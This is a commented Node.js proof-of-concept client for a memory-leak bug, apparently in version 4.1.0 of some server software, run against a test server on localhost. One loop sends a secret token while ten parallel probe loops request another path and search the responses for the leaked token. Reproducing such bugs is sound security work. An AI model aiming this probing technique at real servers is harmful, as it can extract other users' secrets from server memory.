4.1.0 data leak, client
// Two clients in one, both talking to a test server on localhost:7777:
// valid() is the legitimate client that sends the secret token.
// attacker() makes the server leak data and inspects the response for the token.
var http = require('http');
// Secret that valid() sends to the server; attacker() only uses it to
// recognise leaked bytes in a response.
var token = 'MySecretKey';

// Baseline body: the comma-separated string form of 1000 zero bytes
// ("0,0,...,0"). attacker() ignores any response chunk equal to this.
var fine = String(new Uint8Array(1000));
/**
 * Parses a string as a base-10 integer.
 *
 * Exists so it can be passed straight to Array.prototype.map: map() also
 * hands the element index to its callback, and a bare parseInt would treat
 * that index as the radix.
 *
 * @param {string} x - Text to parse.
 * @returns {number} The parsed integer, or NaN when no digits lead the text.
 */
function parse10(x) {
  var parsed = Number.parseInt(x, 10);
  return parsed;
}
/**
 * Runs one probe round against the test server on localhost:7777 and
 * re-arms itself when the round is over.
 *
 * Two GET requests are sent: /file1, whose body is discarded, and
 * /token/invalid, whose body is inspected chunk by chunk. A chunk equal to
 * `fine` is ignored. Any other chunk is read as a comma-separated list of
 * decimal byte values, decoded as UTF-8 and searched for `token`; a hit is
 * printed to the console.
 *
 * NOTE(review): the server is not shown on this page. A hit means bytes
 * that only the valid() client sent came back in a response to a different
 * request - presumably stale memory on the server side; confirm against
 * the server code.
 */
function attacker() {
  // Body of the first response is read and thrown away.
  function discard() {}

  // Looks at one chunk of the /token/invalid response.
  function inspect(chunk) {
    var text = chunk.toString();
    if (text !== fine) {
      // `new Buffer(array)` is deprecated in current Node.js releases;
      // Buffer.from(array) is its replacement there.
      var bytes = new Buffer(text.split(',').map(parse10));
      var decoded = bytes.toString('utf-8');
      if (decoded.indexOf(token) >= 0) {
        console.log('found!');
        console.log(decoded);
      }
    }
  }

  var first = http.request({host: 'localhost', port: 7777, path: '/file1'}, function (res) {
    res.on('data', discard);
  });
  first.end();

  var second = http.request({host: 'localhost', port: 7777, path: '/token/invalid'}, function (res) {
    res.on('data', inspect);
    // Start the next round as soon as this response has ended.
    res.on('end', attacker);
  });
  second.end();
}
// Start ten probe loops side by side; each one keeps itself going through
// the 'end' handler inside attacker().
var i = 0;
while (i < 10) {
  attacker();
  i++;
}
/**
 * Legitimate client: POSTs the secret to the test server on localhost:7777
 * and repeats 100 ms after each response has ended.
 *
 * The token travels twice per request, once in the URL path
 * (/stuff/<token>) and once as the request body.
 */
function valid() {
  var options = {host: 'localhost', port: 7777, path: '/stuff/' + token, method: 'POST'};

  // The response body is read and thrown away.
  function discard() {}

  // Queue the next request once this response is complete.
  function scheduleNext() {
    setTimeout(valid, 100);
  }

  var req = http.request(options, function (res) {
    res.on('data', discard);
    res.on('end', scheduleNext);
  });

  // write() followed by end() is kept as two calls so the request goes out
  // the same way as before.
  req.write(token);
  req.end();
}
// Start the legitimate client; valid() re-schedules itself 100 ms after
// each response ends.
valid();